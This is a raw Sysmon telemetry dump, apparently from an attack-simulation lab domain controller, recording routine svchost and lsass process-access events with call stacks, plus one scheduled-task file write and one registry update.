10:39:53.901{733EE690-3DF9-5F80-0C00-000000007F01}588648C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-0F00-000000007F01}1124C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+b4ff|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+7d09|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\combase.dll+53b8c|C:\Windows\System32\combase.dll+53842|C:\Windows\System32\combase.dll+51968|C:\Windows\System32\combase.dll+4fedd|C:\Windows\System32\combase.dll+4f5bf|C:\Windows\System32\combase.dll+6da09|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5982e|C:\Windows\System32\RPCRT4.dll+39257|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000911Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.901{733EE690-3DF9-5F80-0C00-000000007F01}588648C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000910Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.901{733EE690-3DF9-5F80-0C00-000000007F01}588648C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000909Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.901{733EE690-3DF9-5F80-0C00-000000007F01}588648C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000908Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.901{733EE690-3DF9-5F80-0C00-000000007F01}588648C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 11241100x8000000000000000907Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.localT10532020-10-09 10:39:53.854{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exeC:\Windows\Tasks\SA.DAT2016-09-12 11:34:03.403 13241300x8000000000000000906Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-SetValue2020-10-09 10:39:53.854{733EE690-3DF9-5F80-1200-000000007F01}1208C:\Windows\system32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles\{D949A10C-98FA-429B-8741-CA70A1B09214}\DateLastConnectedBinary Data 10341000x8000000000000000905Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.823{733EE690-3DF9-5F80-0C00-000000007F01}588648C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1400-000000007F01}1348C:\Windows\system32\dwm.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000904Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.823{733EE690-3DF7-5F80-0B00-000000007F01}868100C:\Windows\system32\lsass.exe{733EE690-3DF6-5F80-0100-000000007F01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000903Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.823{733EE690-3DF7-5F80-0B00-000000007F01}868100C:\Windows\system32\lsass.exe{733EE690-3DF6-5F80-0100-000000007F01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000902Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.823{733EE690-3DF9-5F80-0C00-000000007F01}588636C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000901Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.823{733EE690-3DF9-5F80-0C00-000000007F01}588636C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000900Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.823{733EE690-3DF9-5F80-0C00-000000007F01}588636C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000899Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.823{733EE690-3DF9-5F80-0C00-000000007F01}588648C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000898Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.823{733EE690-3DF9-5F80-0C00-000000007F01}588648C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000897Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.823{733EE690-3DF7-5F80-0B00-000000007F01}868100C:\Windows\system32\lsass.exe{733EE690-3DF7-5F80-0A00-000000007F01}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000896Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.823{733EE690-3DF7-5F80-0B00-000000007F01}868100C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000895Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.823{733EE690-3DF7-5F80-0B00-000000007F01}868100C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000894Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.823{733EE690-3DF9-5F80-0C00-000000007F01}588648C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000893Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.823{733EE690-3DF9-5F80-0C00-000000007F01}588648C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000892Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.823{733EE690-3DF7-5F80-0B00-000000007F01}868100C:\Windows\system32\lsass.exe{733EE690-3DF7-5F80-0A00-000000007F01}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000891Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.823{733EE690-3DF9-5F80-0C00-000000007F01}588648C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000890Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.823{733EE690-3DF9-5F80-0C00-000000007F01}588648C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000889Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.823{733EE690-3DF7-5F80-0B00-000000007F01}868100C:\Windows\system32\lsass.exe{733EE690-3DF7-5F80-0A00-000000007F01}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000888Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.823{733EE690-3DF9-5F80-0C00-000000007F01}588648C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000887Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.823{733EE690-3DF9-5F80-0C00-000000007F01}588648C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 